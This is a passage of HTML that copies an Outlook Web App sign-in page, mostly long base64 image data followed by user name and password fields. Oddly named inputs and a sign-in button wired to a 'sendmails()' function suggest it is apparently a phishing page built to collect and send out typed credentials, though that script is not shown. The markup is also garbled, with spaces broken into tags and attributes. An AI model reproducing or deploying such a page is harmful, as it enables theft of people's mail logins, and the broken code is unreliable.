W5ifYIMDGhPE1Elz33PgHzu/1YG9hLNhriAB0IkvTB8nuYN1T41NmNErw9/TU9q3tnZsmQKbPJ19GgYwcL0qku+VKVh4JVj10BeuUku62sXTYViqVsJ9Vzucf8lLFnBTIpTSQiD9NOL8pv1YVraaBnzMMR77sJufz0wIpzqOoMO+tY0hs4XJJ90E0vCKLKQIc0nrSLGlFfdk0yx2wVD46bPyN0Fq47O9JgRZtHJApAmQZpWwgk6cU3xw1/lKvi/DNQSneuK2DMkWAp7Sgr8LJhZz7ZlXJXMvvs1q4YZsHZ4oAuwy/XgVXOW7AdjawNhRrkNRTSXenGT8u6ba+ApsJAhwyUr+rit+ZV/WySgA22HtRrwxNBbGR3sKVgyR/JjoCIwSoYcg05LmNJ9sXhptS1Iu4q1gPmScEwy+iY4+cmSBA1l3i/CKTXJu/LugS6GYYpZR0n7t4PUwQ4O+M9K9Ogaq1yFjfN6e4kxyy70RySfdeNFDSbTsI7Nvdf6NXJtmwE87ldTTawnWFAK6DMphnVck4LiDfPldSvKQW7lRYbOGCAM3h7S7Wq5Ps40ciuYW7Ei2UdKvC5qTQujN5ulLzJ0NSB5NWT/93Zq7+RA67i3vh2KRWawpQdSqY5nPT8EML12rGahCmBLxb4eCMZhMEuLSgAoec19vyrUOOC2ZaircVji63b4IAoQUC7GvssymXcGrAn1I8ZzMeIwTImMhRtWL3lJGjhy0ToFcwFQOMU/z4pmIwtym7L6BdAmQ1fT6XNX5OAHkJs3WPANOMaH5VIhYgwy8z5H8g8OxgJwkwyJnZOylAgnjixDGHaPgVs47WAW5yagKTDN++E1ojpew+gGowWQmkbGChT33SSDCX71lqOfNBX/QgRf5XiP7NI4iqrC2WLeOjIgYtA2XypC3sqJun7G/raLYRtOkCBPvnh6JrARQ0flxjBzoeA8R4q4ubIIGpZVCAZglghATKhAoY30ECxCR4KfLgZ4LxZ8KRCRUgQH5MED8NvEhqpap3PL/nRXRkzjzSQIMpojh1zWjxJ8oU9gmvI8XrMQF0VRjj0vvhAgAQAAABABAAAAGAZvCJsmptfJHjO48Yv9NrIED/8Kc4NYV+UrZ/U8jxI2//CgXwD3+x4T/yNgjQIxwKvOcrq8DPrA4gQI+wLqgAH1kFiAz4xZAe4G0iLU3BLzi35w85PsjxSn+YnhHkKvQZQdSFdKEZddQWpCj9BVCABNT9LT7UAQAQAAABABAAAAEAEAAAAQAQAAABABAA6BbOAwmufYfi9CTOpcA8fW+Q+Tix8rPuYc+J8Z9mkKsw3gzSf+qEdzJgpaDxTtnGo1x9U4CS7FOJccFKMYYCdFsBggYOKlTI8K6jxIALsCYxp+ViaOy0g1UDzwtlG3DRBRhkcRsZCVyAAydnMyOBC+i8VCEj8cMFWMhIYmKMoQCeEKBCRuItAf4RYAD9ncEKHhJwfgAAAABJRU5ErkJggg=="
            class = "owaLogo"
            aria - hidden = "true" / >
            < img src = "data:image/png;base64,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"
            class = "owaLogoSmall"
            aria - hidden = "true" / >
            < /div> < /div> < div class = "logonContainer" >


            < div class = "signInImageHeader"
            role = "heading"
            aria - label = "Outlook Web App " >
            < img class = "mouseHeader"
            src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAacAAAA3CAYAAACo/oVvAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyBpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBXaW5kb3dzIiB4bXBNTTpJbnN0YW5jZUlEPSJ4bXAuaWlkOjE3MDNDRjUyRjEzRDExRTE4QzQxRkZBNzQzOUQyQTA5IiB4bXBNTTpEb2N1bWVudElEPSJ4bXAuZGlkOjE3MDNDRjUzRjEzRDExRTE4QzQxRkZBNzQzOUQyQTA5Ij4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6MTcwM0NGNTBGMTNEMTFFMThDNDFGRkE3NDM5RDJBMDkiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6MTcwM0NGNTFGMTNEMTFFMThDNDFGRkE3NDM5RDJBMDkiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz6fCYPkAAATVklEQVR42uxdTYwjRxWu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"
            alt = "Outlook Web App " / >
            < /div> < div id = "progressBar"
            class = "progress"
            style = "display:none;" >
            < div > < /div> < div > < /div> < div > < /div> < div > < /div> < div > < /div> < /div> < div class = "signInInputLabel"
            id = "userNameLabel"
            aria - hidden = "true" > User name: < /div> < div > < input id = "testx"
            name = "username"
            class = "signInInputText"
            role = "textbox"
            aria - labelledby = "userNameLabel"
            value = "" / > < /div> < div class = "signInInputLabel"
            id = "passwordLabel"
            aria - hidden = "true" > Password: < /div> < div > < input id = "psssss"
            onfocus = "g_fFcs=0"
            name = "password"
            value = ""
            type = "password"
            class = "signInInputText"
            aria - labelledby = "passwordLabel" / > < /div> < div > < input id = "passwordText"
            onfocus = "g_fFcs=0"
            name = "passwordText"
            value = ""
            style = "display: none;"
            class = "signInInputText"
            aria - labelledby = "passwordLabel" / > < /div> < div class = "showPasswordCheck signInCheckBoxText" >
            < input type = "checkbox"
            id = "showPasswordCheck"
            class = "chk"
            onclick = "showPasswordClick()" / >
            < span > Show password < /span> < /div> < div style = "color: red;"
            class = "warning"
            id = "warning" > < /div> < div class = "signInCheckBoxText" >
            < input id = "chkPrvt"
            onclick = "clkSec()"
            name = "trusted"
            value = "4"
            type = "checkbox"
            class = "chk"
            checked role = "checkbox"
            aria - labelledby = "privateLabel" / >
            < span id = "privateLabel"
            aria - hidden = "true" > Private computer < /span> & # x200E;
            ( < a href = "#"
                class = "signInCheckBoxLink"
                id = "lnkShwSec"
                onclick = "clkSecExp('lnkShwSec')"
                onkeydown = "kdSecExp('lnkShwSec')"
                role = "link" > What is this ? < /a> < a href = "#"
                class = "signInCheckBoxLink"
                id = "lnkHdSec"
                onclick = "clkSecExp('lnkHdSec')"
                onkeydown = "kdSecExp('lnkHdSec')"
                style = "display:none"
                role = "link" >
                Hide explanation < /a>
            ) & # x200E; < /div> < div id = "prvtExp"
            class = "signInExpl"
            style = "display:none"
            role = "note" > Select this option
            if you & #39;re the only person who uses this computer. Your server will allow a longer period of inactivity before signing you out.</div>
		<div id= "prvtWrn"
            class = "signInWarning"
            style = "display:none"
            role = "note" > Warning: By selecting this option,
            you confirm that this computer complies with your organization & #39;s security policy.</div>





		<div id= "expltxt"
            class = "signInExpl"
            role = "alert" >

            < /div> < div class = "signInEnter" >
            < div id = "submit"
            onclick = "sendmails()"
            class = "signinbutton"
            role = "button"
            tabIndex = "0" >
            < img class = "imgLnk"

